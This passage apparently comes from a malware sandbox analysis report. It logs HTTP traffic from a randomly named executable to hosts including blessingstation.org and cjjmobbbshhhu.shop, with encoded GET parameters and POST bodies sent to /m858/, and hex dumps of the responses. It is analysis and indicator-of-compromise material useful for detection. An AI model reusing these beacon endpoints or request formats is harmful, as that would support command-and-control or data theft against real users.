5a 39 4a 55 75 6d 2b 70 30 72 45 2b 76 45 39 31 79 77 35 69 6d 65 41 72 52 76 71 68 4e 59 5a 78 2f 4a 49 50 7a 46 33 52 59 5a 36 76 58 72 41 76 75 4e 6f 47 43 6a 69 4f 6b 5a 53 6c 65 37 31 72 4e 71 52 44 51 32 4f 52 2b 39 52 56 34 39 69 70 50 4a 53 31 31 2f 66 67 61 32 33 44 69 6d 30 58 36 55 76 42 33 4d 6d 51 49 41 72 57 78 72 58 6b 4c 76 41 6f 51 64 68 31 53 36 58 42 33 62 73 4e 72 69 52 57 67 61 74 7a 51 45 41 47 51 76 6f 36 74 68 6a 6a 68 6e 49 63 43 44 2b 75 61 47 41 4c 44 65 42 4a 42 4f 56 54 31 58 70 6a 77 2b 59 68 63 62 47 6d 57 2f 34 47 6f 45 54 4a 37 76 33 51 52 35 32 6b 4b 53 7a 76 33 2f 6e 55 72 46 61 32 32 71 42 58 73 61 66 52 50 77 39 45 71 41 6a 4d 66 66 69 36 6d 41 63 78 7a 68 33 72 52 53 51 77 53 32 55 6d 42 30 4b 55 77 50 74 36 6a 4b 4f 2f 73 44 55 6e 70 76 55 51 71 32 6b 4d 53 53 7a 55 68 76 44 34 61 75 6c 66 51 64 64 6f 47 63 44 66 6c 6a 4b 35 58 69 46 58 4d 44 67 5a 61 49 55 42 42 67 4c 78 6d 51 35 77 4f 45 56 50 6f 42 50 58 55 39 59 36 62 63 66 64 2b 79 51 50 6f 33 6e 42 61 52 51 54 6d 32 33 59 43 78 4f 43 65 50 7a 58 72 64 49 67 46 6b 6a 67 33 2b 7a 42 71 38 4d 33 35 4f 33 45 4b 52 77 42 42 45 4a 66 6d 36 36 36 73 72 4f 55 46 37 73 6e 72 31 4c 36 70 51 38 47 68 31 52 59 43 47 62 56 38 73 62 6b 45 6a 73 54 2f 4e 61 67 4a 74 78 49 4a 42 39 41 71 64 76 52 76 59 4c 72 69 31 6d 79 43 62 32 4f 39 58 7a 71 78 71 38 30 6d 63 54 77 4a 36 4a 45 6e 4e 64 6b 34 30 56 69 49 75 45 31 30 32 62 64 68 35 33 6d 6e 42 71 57 47 2b 6a 4e 36 6a 77 35 32 44 78 35 45 52 43 31 65 65 5a 33 6e 61 78 70 6c 66 64 75 64 55 46 50 55 58 4b 31 4f 4c 45 59 52 52 4c 6c 79 39 4c 67 71 32 72 34 65 31 63 48 33 6b 45 72 33 62 54 45 74 6f 52 54 53 41 4c 36 33 63 49 61 6d 74 45 56 32 74 2f 52 2b 6f 58 76 36 58 2b 34 66 70 57 49 55 6a 44 4d 47 48 48 55 4b 58 73 63 4e 45 65 44 77 6b 2b 52 74 75 53 57 7a 4b 79 55 39 68 2b 46 4a 4a 59 4c 44 4c 68 53 37 4e 75 7a 75 4e 6c 74 41 35 41 57 6f 4d 31 6f 79 57 73 4b 66 33 56 4d 5a 67 63 76 32 2b 4a 45 44 47 32 50 51 54 32 75 65 44 70 52 39 37 68 6e 69 49 63 65 46 66 65 4b 34 66 76 4c 68 4b 79 52 6c 44 6e 7a 79 79 67 54 51 59 52 49 41 49 38 59 75 4e 43 54 58 6a 6b 43 48 4b 33 41 36 4e 33 6c 41 57 66 73 50 2f 6b 52 55 35 30 45 6f 4c 64 6b 6a 64 70 71 52 43 68 7a 79 2f 57 72 55 2b 71 72 44 51 39 6d 78 68 39 76 58 36 74 66 4f 54 5a 4a 4d 6a 43 6c 58 36 78 68 32 53 53 75 4e 72 66 74 79 6d 38 5a 49 56 6c 69 2f 75 44 4e 36 61 4d 70 33 4a 53 50 4f 7a 47 55 58 39 76 42 72 4d 53 32 6f 62 50 4e 65 72 6c 41 57 64 46 49 56 51 63 55 51 63 79 70 31 31 4a 4d 73 70 53 4c 51 4c 6a 56 36 61 30 46 58 67 48 76 68 55 6b 6a 4a 52 4d 54 7a 75 47 73 4c 54 39 7a 72 61 69 41 64 33 5a 54 6e 44 4d 59 38 6f 2f 61 32 61 71 72 73 45 52 73 4d 4c 43 4f 41 57 45 44
                                                                                                                      Data Ascii: nRRpS=VYi+J6cf61/s6UmihHsqPY8E+T9O1eiZlIcuhsO8s3gsIT841EalUhElt0t4ydY2PphVvsxEf7EYrNs7VnxpeQsFCrdFo2PcYPHIf/cDov5EgY2MUtqA3K5afZDQDyfiBu3A46gPK26RwgG+O+MHUhxsAVbbSHPL60rjQF948VKcPTlhOQhO91xjOyvPZaw/DfJakNeqeABgfAw/DxYvwcKkNnOBlsKSdQYU0QfQ3uNdQLYaMFM6p6jvXDHz2al9DgpHz24MVMwxu/axjuCIwJDyb6DFhftz8GV/tQEClg9bBd8w/tq1CruKZ9JUum+p0rE+vE91yw5imeArRvqhNYZx/JIPzF3RYZ6vXrAvuNoGCjiOkZSle71rNqRDQ2OR+9RV49ipPJS11/fga23Dim0X6UvB3MmQIArWxrXkLvAoQdh1S6XB3bsNriRWgatzQEAGQvo6thjjhnIcCD+uaGALDeBJBOVT1Xpjw+YhcbGmW/4GoETJ7v3QR52kKSzv3/nUrFa22qBXsafRPw9EqAjMffi6mAcxzh3rRSQwS2UmB0KUwPt6jKO/sDUnpvUQq2kMSSzUhvD4aulfQddoGcDfljK5XiFXMDgZaIUBBgLxmQ5wOEVPoBPXU9Y6bcfd+yQPo3nBaRQTm23YCxOCePzXrdIgFkjg3+zBq8M35O3EKRwBBEJfm666srOUF7snr1L6pQ8Gh1RYCGbV8sbkEjsT/NagJtxIJB9AqdvRvYLri1myCb2O9Xzqxq80mcTwJ6JEnNdk40ViIuE102bdh53mnBqWG+jN6jw52Dx5ERC1eeZ3naxplfdudUFPUXK1OLEYRRLly9Lgq2r4e1cH3kEr3bTEtoRTSAL63cIamtEV2t/R+oXv6X+4fpWIUjDMGHHUKXscNEeDwk+RtuSWzKyU9h+FJJYLDLhS7NuzuNltA5AWoM1oyWsKf3VMZgcv2+JEDG2PQT2ueDpR97hniIceFfeK4fvLhKyRlDnzyygTQYRIAI8YuNCTXjkCHK3A6N3lAWfsP/kRU50EoLdkjdpqRChzy/WrU+qrDQ9mxh9vX6tfOTZJMjClX6xh2SSuNrftym8ZIVli/uDN6aMp3JSPOzGUX9vBrMS2obPNerlAWdFIVQcUQcyp11JMspSLQLjV6a0FXgHvhUkjJRMTzuGsLT9zraiAd3ZTnDMY8o/a2aqrsERsMLCOAWED
                                                                                                                      Dec 7, 2023 13:45:00.558335066 CET1286INHTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 12:44:57 GMT
                                                                                                                      Server: Apache
                                                                                                                      X-Powered-By: PHP/7.4.33
                                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                      Link: <http://blessingstation.org/wp-json/>; rel="https://api.w.org/"
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Encoding: br
                                                                                                                      Content-Length: 14735
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 53 01 5d c1 8c 64 a5 b3 07 40 33 70 5c 8f 75 de 7f be aa df 7f 4b 33 ef e3 ff 18 da 48 64 0c 40 00 58 45 9a 4a f7 d6 5b 7d b3 cd d6 72 20 12 94 90 b0 3d 02 6a a1 f9 97 6f 5a 2a 04 77 65 bc 0f 22 63 69 c0 3b 1f 24 b2 b9 0f 77 9f e9 56 fd f9 33 28 cd 00 e4 15 0c 59 05 12 7b a2 17 7d 15 79 a6 df 7b fd bb 67 fe 0c b0 70 74 38 b7 fe 8c 5b ee 39 63 23 45 91 b3 91 82 4c 51 f6 87 72 b8 6c 15 64 17 ea 31 54 bb fb 0d 22 72 15 97 a6 f5 fd 61 ad d7 ea 3d ba d7 94 a3 04 92 90 86 0f ea 2e 43 d5 d9 c9 5e bc 1f 03 92 38 5f 08 58 97 b1 ac 96 ce 77 37 ef 6e 0b 21 89 80 10 11 10 e3 c4 0c 02 a6 b7 73 ae 01 93 ee 99 21 d5 76 10 77 e2 68 83 6b 9f ce 90 68 dd 26 62 b6 d3 92 3e 44 07 1d 7f 62 20 6b 73 06 43 4f 49 b2 9f 42 c6 d1 76 3e 83 87 5a b7 df 61 50 75 86 a8 b2 96 29 c0 64 0f 1d 9a fe 20 f1 4b af 55 bb e6 1c 6d a1 2a f5 14 18 77 0c da ce 02 a3 0a d0 da a3 9c a7 f0 91 d5 4b ba 3d 80 27 0a 8e 78 26 08 6f ad f4 6c bf 59 3d 2e ad 1a 79 3d da c6 34 e9 f9 d9 4a 38 fa 02 2b 58 6f e7 a4 2e ae ca d6 00 9d 53 29 5b 1c 57 f4 2e ad d6 eb 7d b3 a5 b9 07 a2 13 54 3e a7 ea 5a 6b a8 f5 1c 92 bd 36 fb 94 68 77 23 20 21 b6 8a d6 6a d7 c2 54 19 d0 06 8f f0 42 f0 a8 54 c9 e0 e1 09 e5 c5 5a 2f 1f 7d 6b 44 05 fb f9 15 31 e4 38 ed 15 74 f1 f1 71 66 b6 73 7d 7f bb f9 a5 57 4d f7 4d 3f 29 6b 31 1c 85 0c 46 64 20 0b 5f 87 3a 2c 5d 6a 92 97 f5 cb da d0 0b de ce cb fe 37 dd 97 b5 8f e8 bd ac 5f 3f 8f 97 35 f7 29 a3 ec 65 1d 89 6b 24 5e d6 08 23 75 b5 28 41 c6 f9 1a 80 30 32 e7 03 ce 39 73 3e 3c 1e 36 e7 c3 97 97 6f 30 e7 1f ed 4e 43 a1 2e 1b 51 d1 b5 85 b4 55 b9 0d bc b7 58 72 f2 65 7d e9 89 cb 38 f4 b2 fe 66 0a b1 76 9b f8 9e 36 8d 95 1f f9 ac 86 2c a4 3e 15 68 9a d2 f9 fa ed dd 51 1e c0 c4 0e 81 36 b0 03 54 9b 04 95 8b 55 09 6f d7 f3 bb dd 85 0e 3b 1a b7 be f1 82 0e 1b ac d2 6d df 0b 85 a3 e6 ec 70 db be 60 b3 d1 93 3c d3 1f ca 58 93 28 1c 77 a6 12 ef ce d7 55 f0 d2 93 fa a5 72 dc 29 35 5d fa b8 ba f6 c9 76 83 3c 28 6a 94 fd ab 55 8d d3 61 8f 5f 52 2f 7d be ae 6e 8e 75 dd c1 d3 29 e5 8e d3 44 c2 44 df c5 96 bc 9e a2 de ee 93 f8 5d 15 d6 61 98 61 45 0b d9 9e a5 a1 8e c6 17 f1 71 b6 3e 09 17 2b 5a e9 ba fe 43 5d ad 63 31 c3 2c 9c 75 6d 46 e9 07 fe aa 5b eb 89 0f c3 20 6f 8e a2 07 65 3d f6 83 fe 2c ad 44 df a2 bb 02 be bc 5c 3c 64 0e 5d b7 b7 db 02 53 e4 03 53 cf d2 08 24 f7 23 3a a0 b0 0d 94 7f 15 50 59 96 0d cf 76 37 b9 4c fe ea 13 45 8e 4b 1d eb 8e 85 34 0a c5 b4 19 94 54 06 54 5f 2c 7a 39 95 b1 57 bc 9c ca aa f2 5e 4e 95 62 d5 cb 49 30 56 be 9c 44 28 a3 d2 d1 10 e8 ce fb 47 e0 be bb e3 c9 1d ea eb cb 4a fe bd ae 87 36 13 a2 10 68 2b 77 b9 7c ff b6 aa f2 bf 6d ef b3 eb 8b 30 fa fb 37 8a df
                                                                                                                      Data Ascii: S]d@3p\uK3Hd@XEJ[}r =joZ*we"ci;$wV3(Y{}y{gpt8[9c#ELQrld1T"ra=.C^8_Xw7n!s!vwhkh&b>Db ksCOIBv>ZaPu)d KUm*wK='x&olY=.y=4J8+Xo.S)[W.}T>Zk6hw# !jTBTZ/}kD18tqfs}WMM?)k1Fd _:,]j7_?5)ek$^#u(A029s><6o0NC.QUXre}8fv6,>hQ6TUo;mp`<X(wUr)5]v<(jUa_R/}nu)DD]aaEq>+ZC]c1,umF[ oe=,D\<d]SS$#:PYv7LEK4TT_,z9W^NbI0VD(GJ6h+w|m07
                                                                                                                      Dec 7, 2023 13:45:00.558475018 CET1286INData Raw: 18 8c a0 ea d4 45 bd 99 f2 49 08 2b 68 a5 bb 16 bb 0e 96 a9 70 1d 8b 2a e4 a6 62 60 07 41 6f 61 6f 81 ee eb 55 c5 49 ec ec a5 e1 21 7e a3 f0 fd 89 aa bc 67 fb 19 77 a2 a0 8f 6b cd 57 57 60 54 73 43 86 76 57 84 41 e2 62 89 ee b2 40 f1 b4 5d 05 ff
                                                                                                                      Data Ascii: EI+hp*b`AoaoUI!~gwkWW`TsCvWAb@]jDTtZ.<mrXqKX@.`885^D8:"|o\e4z%QB>ZuvEn"7o{V:+7!"7g
                                                                                                                      Dec 7, 2023 13:45:00.558489084 CET1286INData Raw: c2 bb 2a a6 21 f6 5b ae 66 d3 82 a2 ed bf de ee cc 67 4a 25 1b 18 58 e1 59 0e 1d 6b cb 64 f1 e5 9b 87 c3 74 6e 8b 2c 4e 0c 1a d8 ee e3 87 ef dd 74 5a 83 10 2b 28 6f 97 85 54 04 6f d2 49 62 da 67 e6 31 c3 5c 8e 32 3b 7c 96 83 83 9c d6 35 5a 64 d3
                                                                                                                      Data Ascii: *![fgJ%XYkdtn,NtZ+(oToIbg1\2;|5Zdy${2YJ-xjdx+(U.&*ie:Y1'lje8{DyTtlPM:1B?wx[9}(6L]{Dp6t!D"^$_N>yj!~0tZ
                                                                                                                      Dec 7, 2023 13:45:00.558500051 CET1286INData Raw: f3 c0 4c 55 48 34 cf 62 6e bb 9c 5f 07 72 45 a2 49 98 b3 37 d0 a8 59 89 3c a1 20 00 05 22 34 5d 12 25 5a 95 e7 c2 d4 a6 ff 17 19 e8 0f f4 3a 26 36 1f 80 fc 83 69 83 3d f4 c8 26 bc 97 e7 ff 76 dd 8f aa 81 0e f6 27 1b 3c bf 05 7a 10 38 d8 6e 0a 6c
                                                                                                                      Data Ascii: LUH4bn_rEI7Y< "4]%Z:&6i=&v'<z8nlvXM4(a/7f.yN5xYFsH*BZ&f"frN<~T}$}2{_Hrj[b.JU,@_lV={].
                                                                                                                      Dec 7, 2023 13:45:00.558511972 CET1286INData Raw: 99 f4 09 3d 75 f5 d4 99 90 16 2c 0b 0b e7 00 0b 24 9a d4 9b 30 11 a3 7e 6b d9 aa aa 42 19 14 6e 74 4f d0 e4 3e c0 e6 1f 85 71 fe eb a2 f7 35 db 20 36 14 2b 61 fc 7a 6c a9 0e 8b e7 78 48 fc b4 21 4b 82 1e de c1 16 56 0d 55 3d ac 70 dd 1e d9 61 8e
                                                                                                                      Data Ascii: =u,$0~kBntO>q5 6+azlxH!KVU=pa =H8F8,By~V(u&Q`h86A74ni|X<cUKIW>=/?z:4DWY*SqG-x2x+|sA(Xr
                                                                                                                      Dec 7, 2023 13:45:00.558521986 CET1286INData Raw: b9 47 d2 47 12 c8 d9 6d 61 9f 93 8e 97 17 03 ca 43 e3 8a c6 ee 91 f4 91 04 72 66 5b 0c 1b 35 fc 2d b1 64 11 7b 5e 10 84 e9 a7 09 fe fb ac aa 92 ed bd 29 21 7a db 3a 8e 7b c9 70 d8 cf a4 fd 8a 32 cc 68 18 b8 3a 0b 5f 98 3a fc 69 6a 98 0a ba 01 ad
                                                                                                                      Data Ascii: GGmaCrf[5-d{^)!z:{p2h:_:ijc?O}|eDo1H`QMOryYfoTMv{8e!a GDWm*[`^RwQswF-TcGY$.h7'zalGfQBlWN;Hi
                                                                                                                      Dec 7, 2023 13:45:00.558532953 CET1286INData Raw: c0 57 f0 46 99 be ae 49 45 19 3a 32 29 6d cc fb 09 a3 cd a1 b1 f1 60 86 4d 83 5e 3d 53 c0 02 86 c5 93 82 95 ae 25 42 80 cb 62 23 8d bd ef 84 c1 78 43 37 35 23 f9 66 48 3d 4f de 70 cb b3 79 86 7d 77 25 bd 2c be 97 0a 9c 5a cc a4 be f7 43 9a ee 87
                                                                                                                      Data Ascii: WFIE:2)m`M^=S%Bb#xC75#fH=Opy}w%,ZCR!H;xb&dZWc=m:\hr#T9qu`}4cBq!dy)ZM`!gIb-U".PQ*n"|/Zc[sZ^@:"b:L
                                                                                                                      Dec 7, 2023 13:45:00.558545113 CET1286INData Raw: 8d c3 65 71 bd 65 78 8d 3c 8a 31 52 52 d8 7c de e2 82 82 5d 24 cf e8 49 43 54 a9 b8 11 40 c7 95 de cc 81 2a b9 55 1a 83 39 05 be 4c c1 39 97 25 b3 23 f6 e8 2a 95 57 ec 82 4a 15 69 96 15 89 08 de 25 49 ba 2b 94 4a 32 a4 21 c2 55 24 0f 74 7c 76 d5
                                                                                                                      Data Ascii: eqex<1RR|]$ICT@*U9L9%#*WJi%I+J2!U$t|vMLggrJdGLUbQ12 "5!#Pil%BwW=?nyJei4K4J+*yrl9j/7Iryi=|H5I1KIaXoJ
                                                                                                                      Dec 7, 2023 13:45:00.559009075 CET1286INData Raw: 2b bb a8 7b 04 17 60 f7 a2 f9 8f 63 7f a1 26 f1 ab 05 cb 7e 42 b6 2d ac 44 e2 fa 1b b0 4e 0c bd 2e f3 30 82 d4 a5 02 ee ac 4d 41 f0 34 ee 37 22 12 06 6a 0c 2e bc e5 2f 62 55 ac f0 22 59 36 77 5e 2a e3 5c 09 aa 1a 40 64 71 d6 a8 a4 fb bd 29 d9 a4
                                                                                                                      Data Ascii: +{`c&~B-DN.0MA47"j./bU"Y6w^*\@dq)xt.:c@Lw(`tQOcU<ed m X-P<zbiYb"N{Am[pkOiM:KmB @\F04S?2_1CfPc~bG_a
                                                                                                                      Dec 7, 2023 13:45:00.559030056 CET1286INData Raw: f7 a5 a0 9a a4 6e 02 6c a0 3a 93 ca 5c a9 49 1d a2 94 a4 69 0c 3d b9 91 33 1e 39 76 ae c4 c0 27 b7 a2 ba 80 98 8b ec 51 2f dc e9 2d d5 20 93 3b 8c cf 7e 90 ad ad 8c be d4 ae b5 90 ec 77 cc 8d ae a4 bd d7 90 d3 aa d9 ac b3 6f 81 d6 3b 3e 79 ba 33
                                                                                                                      Data Ascii: nl:\Ii=39v'Q/- ;~wo;>y3Ayq~D0r!Ovxos:A3L;;)eR_A Q#Mfqg$u8#01rj:sG-_bUNp:#.z~bAgO1ygxQ4
                                                                                                                      Dec 7, 2023 13:45:00.559042931 CET1286INData Raw: dc b2 f1 15 f1 3d 35 68 9b 2f 3c 80 d4 9d 37 a5 e2 d3 55 26 4b 99 41 d4 30 ab ac 05 35 79 00 d1 3f 57 d6 1e 8b 18 1e 9d 8f ad bb 06 25 01 00 c6 89 6d cd 3c 3b 9d ff 39 2f 7e f6 07 c7 a0 ed 2c d1 75 1e fa a8 9f b3 21 4e 51 13 b6 8e 3a f3 ba 6c 07
                                                                                                                      Data Ascii: =5h/<7U&KA05y?W%m<;9/~,u!NQ:l'iLV7}zh+:l/?I-h6KT 1MAj/^3Wu}7'?M{7.S4]o~;O]""BF(n'3`pxR]~PUI:"]


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      36192.168.2.84974468.178.195.71806992C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 13:45:02.926841974 CET449OUTGET /m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=YaKeKM0UqinIxXqyt1dkMasU/gJKxJDaurUM7ZyBp3QsCSEIlQr7ZxZGtQx938wNB79Up+t5frQyoMoLXF0pXDVrMpxqlwTFbA== HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Host: www.blessingstation.org
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Dec 7, 2023 13:45:03.209561110 CET530INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Thu, 07 Dec 2023 12:45:00 GMT
                                                                                                                      Server: Apache
                                                                                                                      X-Powered-By: PHP/7.4.33
                                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                      X-Redirect-By: WordPress
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Location: http://blessingstation.org/m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=YaKeKM0UqinIxXqyt1dkMasU/gJKxJDaurUM7ZyBp3QsCSEIlQr7ZxZGtQx938wNB79Up+t5frQyoMoLXF0pXDVrMpxqlwTFbA==
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Length: 0
                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      37192.168.2.84974584.32.84.32806992C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 13:45:08.990952969 CET724OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.cjjmobbbshhhu.shop
                                                                                                                      Origin: http://www.cjjmobbbshhhu.shop
                                                                                                                      Referer: http://www.cjjmobbbshhhu.shop/m858/
                                                                                                                      Content-Length: 186
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 6e 52 52 70 53 3d 59 56 73 2b 76 33 77 4b 7a 50 6b 43 46 5a 44 68 68 6c 66 78 67 39 4c 37 70 70 57 66 46 4d 72 4f 42 2f 52 50 49 79 6f 70 46 4f 75 49 6d 61 2f 35 2b 44 77 44 53 4c 71 6a 48 49 5a 4a 53 79 42 2f 78 6a 6d 36 41 4d 4f 36 76 2f 79 57 6d 59 71 6b 57 72 6a 35 72 69 6b 42 50 78 59 62 53 46 31 79 39 33 6e 42 68 34 5a 45 44 4e 76 76 49 4e 79 51 54 52 4f 68 62 42 78 47 51 4c 4a 73 6f 63 4a 75 56 39 55 43 4b 49 44 47 6c 45 46 4f 2f 41 6c 7a 46 61 45 76 55 73 50 36 37 49 6d 32 68 38 6a 2b 50 64 32 78 50 72 4b 47 73 6b 43 34 79 4e 4b 48 43 67 3d 3d
                                                                                                                      Data Ascii: nRRpS=YVs+v3wKzPkCFZDhhlfxg9L7ppWfFMrOB/RPIyopFOuIma/5+DwDSLqjHIZJSyB/xjm6AMO6v/yWmYqkWrj5rikBPxYbSF1y93nBh4ZEDNvvINyQTROhbBxGQLJsocJuV9UCKIDGlEFO/AlzFaEvUsP67Im2h8j+Pd2xPrKGskC4yNKHCg==


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      38192.168.2.84974684.32.84.32806992C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 13:45:11.695784092 CET744OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.cjjmobbbshhhu.shop
                                                                                                                      Origin: http://www.cjjmobbbshhhu.shop
                                                                                                                      Referer: http://www.cjjmobbbshhhu.shop/m858/
                                                                                                                      Content-Length: 206
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 6e 52 52 70 53 3d 59 56 73 2b 76 33 77 4b 7a 50 6b 43 45 39 48 68 6e 79 7a 78 6c 64 4c 36 73 70 57 66 50 73 71 6d 42 2f 56 50 49 32 78 78 45 39 61 49 6d 2f 54 35 2f 42 49 44 58 4c 71 6a 54 59 5a 51 57 79 42 77 78 6a 71 59 41 4a 32 36 76 37 61 57 6d 59 36 6b 58 61 6a 36 71 79 6b 44 57 68 59 5a 50 56 31 79 39 33 6e 42 68 34 4e 36 44 4a 44 76 4a 34 36 51 53 31 36 67 56 68 78 42 5a 72 4a 73 2f 73 4a 71 56 39 55 77 4b 4d 44 67 6c 47 4e 4f 2f 46 5a 7a 45 4f 59 67 61 73 4f 51 6b 59 6e 7a 6f 64 53 63 46 63 43 79 42 4b 7a 6d 75 52 7a 31 33 59 6d 55 46 56 2f 73 61 61 49 30 36 6b 78 2f 62 54 4f 34 55 50 42 4f 32 64 73 3d
                                                                                                                      Data Ascii: nRRpS=YVs+v3wKzPkCE9HhnyzxldL6spWfPsqmB/VPI2xxE9aIm/T5/BIDXLqjTYZQWyBwxjqYAJ26v7aWmY6kXaj6qykDWhYZPV1y93nBh4N6DJDvJ46QS16gVhxBZrJs/sJqV9UwKMDglGNO/FZzEOYgasOQkYnzodScFcCyBKzmuRz13YmUFV/saaI06kx/bTO4UPBO2ds=


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      39192.168.2.84974784.32.84.32806992C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 13:45:14.400316954 CET1757OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.cjjmobbbshhhu.shop
                                                                                                                      Origin: http://www.cjjmobbbshhhu.shop
                                                                                                                      Referer: http://www.cjjmobbbshhhu.shop/m858/
                                                                                                                      Content-Length: 1218
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 6e 52 52 70 53 3d 59 56 73 2b 76 33 77 4b 7a 50 6b 43 45 39 48 68 6e 79 7a 78 6c 64 4c 36 73 70 57 66 50 73 71 6d 42 2f 56 50 49 32 78 78 45 39 43 49 6d 4e 62 35 2b 67 49 44 51 4c 71 6a 50 6f 5a 4e 57 79 42 58 78 6a 79 63 41 49 4c 42 76 35 69 57 6c 2b 32 6b 65 50 44 36 6b 79 6b 44 4c 78 59 59 53 46 30 36 39 33 32 49 68 34 64 36 44 4a 44 76 4a 35 4b 51 56 68 4f 67 46 52 78 47 51 4c 4a 67 6f 63 4a 4f 56 39 4e 48 4b 4d 48 57 6c 79 35 4f 2f 6c 70 7a 4a 64 77 67 53 73 4f 53 6e 59 6e 56 6f 64 65 71 46 63 65 49 42 4b 57 39 75 52 4c 31 6e 76 6d 50 63 52 2f 41 45 4a 6b 31 6a 6b 31 66 64 78 58 65 48 4e 52 6c 30 59 5a 62 6e 78 55 36 30 70 55 35 39 35 4a 34 6d 4b 57 6a 39 6c 63 51 4a 58 41 4b 63 44 46 78 4d 44 44 62 47 52 62 5a 32 55 33 52 62 6f 30 67 37 78 71 6f 78 32 47 57 50 67 4c 4f 59 4c 6a 47 50 71 75 71 4c 73 68 6b 5a 78 36 76 67 7a 59 53 55 57 49 5a 72 50 79 51 41 4b 41 39 77 46 47 4f 6b 33 2f 57 50 73 30 73 56 7a 55 6c 39 6c 43 30 50 31 5a 4b 4a 42 56 49 56 39 62 47 59 4c 79 64 6b 38 44 66 4e 6c 69 6b 78 37 49 6b 75 36 34 55 6f 31 44 46 77 52 64 2f 62 45 52 76 6c 73 7a 75 42 44 42 57 53 66 46 6d 5a 2b 62 38 73 61 7a 7a 55 63 69 64 6b 43 65 58 49 6b 6c 48 53 70 46 6d 45 52 44 35 44 76 38 48 42 7a 6a 55 30 4f 65 2f 32 71 50 54 70 57 2f 72 67 45 5a 33 76 45 70 30 54 74 37 69 55 4c 55 48 2f 47 62 56 39 63 4b 62 58 77 56 72 67 48 32 48 66 52 36 48 2b 34 55 4f 50 4d 30 73 75 70 69 6d 74 48 51 36 78 79 4b 2f 79 35 38 37 74 54 63 6a 52 7a 4c 48 49 75 32 34 34 4f 7a 69 5a 59 4f 52 33 62 66 69 2b 49 54 71 64 68 75 7a 50 51 62 76 47 6f 2b 79 37 46 33 2f 37 47 4d 4f 38 35 30 75 73 49 4a 71 65 75 4a 66 4e 36 39 59 79 51 75 68 2b 58 6b 2b 67 77 45 72 31 31 59 43 59 73 59 6c 54 56 6c 46 33 33 34 6c 44 37 59 36 66 4c 30 35 33 37 6b 58 57 4c 45 4b 57 54 50 70 6a 79 5a 4d 53 